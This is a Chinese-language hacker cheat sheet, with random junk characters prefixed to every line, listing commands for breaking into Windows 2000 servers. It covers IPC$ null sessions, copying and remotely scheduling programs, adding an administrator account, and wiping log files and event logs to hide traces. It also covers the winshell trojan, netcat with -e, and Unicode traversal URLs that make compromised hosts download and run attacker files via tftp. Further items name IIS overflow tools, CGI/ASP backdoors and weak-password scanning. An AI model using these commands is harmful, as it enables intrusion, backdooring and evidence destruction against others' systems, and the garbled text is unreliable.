网管和黑客都必须知道的命令
)mT{w9u 常用的几条NET命令:
d[;S n:B w[~O@:`]<o (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
HP}d`C5<R 3qR%Mf' (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
;HtHN
K(o jc)[5i0 (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
rH"& $TyV<
G (查看远程主机时间) net time \\IP地址
S
'S|k7Lp ?B3
(定时启动某个程序) at \\IP地址 02:18 readme.exe
`?+lM Nb~.6bsL (查看共享) net view \\IP地址
oswS<t{Z I?}YS-2 (查看netbios工作组列表) nbtstat -A IP地址
V`sINX ;^za/h>r (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
DUUQz:?{J >0z(+}]3z (这两条把自己增加到管理员组): net user 用户名 密码 /add
H3"90^|,@
pbM~T(Y8 net localgroup Administrators 用户名 /add
N=]2vyh jHBzZ!< (断开连接) net use \\IP地址\ipc$ /delete
r8x<-u4 x?v/| 扫尾:
Z+!._uA %;$zR} del C:\winnt\system32\logfiles\*.*
8R<2I1xn2 ;L (dmx? del C:\winnt\ssytem32\config\*.evt
MwMv[];I ^}vL ZA del C:\winnt\system32\dtclog\*.*
Q^}6GS$ 9aky+ del C:\winnt\system32\*.log
[+<lm
5t f mu `o- del C:\winnt\system32\*.txt
$Tci_(V=F ?UCK del C:\winnt\*.txt
T<1*R>el {,61V;Bpm del C:\winnt\*.log
[9dW9[Z+! is@8x!c 一、netsvc.exe
h8OmO5/H qP=4D
9 ] 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
w9h`8pt L6S!?t.{Yv netsvc /list \\IP地址
vDl6TKXcu
`R]B<gp netsvc schedule \\IP地址 /query
,U':=8 !lf'gW netsvc \\IP地址 schedule /start
X&R,-^ s3?pv 二、OpenTelnet.exe
=g)|g+[H K'z|a{ru.{ 远程启动主机的Telnet服务,并绑定端口到7878,例如:
#Duz|F+% hZ6CiEJB OpenTelnet \\IP地址 用户名 密码 1 7878
#;,dk(URo _
T ;+* 然后就可以telnet到主机的7878端口,进入DOS方式下:
=s3f{0G JtA
tG% telnet IP地址 7878
P?D;BAP2 Hq=5/N 三、winshell.exe
Ch;C\H:X 8Ac5K! 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
9,8}4Y=GVI 92zo+bc p Path (查看winshell主程序的路径信息)
$}kT)+K Z#w@ /!"}T b reBoot (重新启动机器)
:ZrE/3_S h2M>4c d shutDown (关闭机器)
zq\YZ:JC *UM=EQaYk s Shell (执行后你就会看到可爱的“C:\>”)
+*/XfPlr| B+W 4r9# x eXit (退出本次登录会话,此命令并不终止winshell的运行)
cVCylRU" DPIIE2X CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
i`#5dIb ^0"W/ 四、3389登陆器,GUI方式登录远程主机的
M;s r1C 6XU1w 五、elsave.exe
(<y~]ig y \Eqxmo 事件日志清除工具
%C}TdG(C b|_Pt elsave -s \\IP地址 -l "application" -C
VsLlPw{ Z1u:OI@( elsave -s \\IP地址 -l "system" -C
h,QC#Ak o *2wFLh elsave -s \\IP地址 -l "security" -C
o\ss R Ptc \4 执行后成功清除应用程序日志,系统日志,安全日志
QAs$fi}f]s wCT. (d_ 六、hbulot.exe
G+Gd;`4 -n.ltgW@ 开启win2kserver和winxp的3389服务
u!wR 9a4Xf%!F>z hbulot [/r]
doeYc Ci{,e% 使用/r表示安装完成后自动重起目标使设置生效。
GI:J9TS ~{-zj 七、nc.exe(netcat.exe)
B5FRe'UC `+Ko{rf+9 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
+\r=/""DW 4@|"1D3 想要连接到某处: nc [-options] hostname port[s] [ports] ...
f;";P 0|mF
/ 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
3eOwy~ UvwO/A\Gv 参数:
hRKAs
]^j ZcT%H*Ib]9 -e prog 程序重定向,一旦连接,就执行 [危险!!]
A^\A^$|O6 Ns3k(j16 -g gateway source-routing hop point[s], up to 8
Zp:(U3% /F/zMZGSA{ -G num source-routing pointer: 4, 8, 12, ...
V)HX+D> 1D@'uApi. -h 帮助信息
fcDiYJC* j A/xe -i secs 延时的间隔
(A@~]N,U/ Na6z1&wS -l 监听模式,用于入站连接
o u%Xnk~ Q[5j5vry -n 指定数字的IP地址,不能用hostname
%5) 1^ vR;?~^{*s -o file 记录16进制的传输
\J@i:J6x$1 AC`4n|,zJ; -p port 本地端口号
Atdr|2 ey icMy`7{ -r 任意指定本地及远程端口
5G$sP,n QOb+6qy:3 -s addr 本地源地址
R<"fcsU )83UF
r4kP -u UDP模式
<m") 2dJ ?\_\pa/+ -v 详细输出——用两个-v可得到更详细的内容
}cl~Vo-mp EMe3Xb
` -w secs timeout的时间
. \/jy]Y OC(S"&D -z 将输入输出关掉——用于扫描时
2;!,:bFb 八、TFTPD32.EXE
W Z!?O0.A <oJM||ZA 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
R8Kj3wp e|6kgj3/ http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
G6l:El& *<.{sx^Gk 然后可以直接令文件运行:
+`y{r^xD |@Cx%aEKU http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
zk#NM"C+ ~ 9F
rlj 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
P1gW+*? YU*u! 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
6a_MA*XK UaW,#P 一、一 Xscan命令行运行参数说明:
?vnO@Bb/a H>zX8qP+ 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
c/K:`XP~ yJyovfJz. 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
V'-}B6 3S> ?W6qwm,?L xscan -file <主机列表文件名> <检测项目> [其他选项]
nTG @=C# 2 %`~DVo 其中<检测项目> 含义如下:
q:}Q5gzZ F_<n8U:Y -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
df85g 8[PD`*w -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
3e)W_P*0? {~L{FG)O -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
;7;=)/- +-s$Htx -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
eUY/H1 { :^;byd -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
~2HlAU))<& BVJ6U[h` [其他选项] 含义如下:
5ov F$qn D7X8yv1 -v: 显示详细扫描进度
IdHydY1 C[4{\3\Va -p: 跳过Ping不通的主机
a/@F?\A `f|Gw5R -o: 跳过没有检测到开放端口的主机
bi@z<Xm% Fj_6jsDb -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10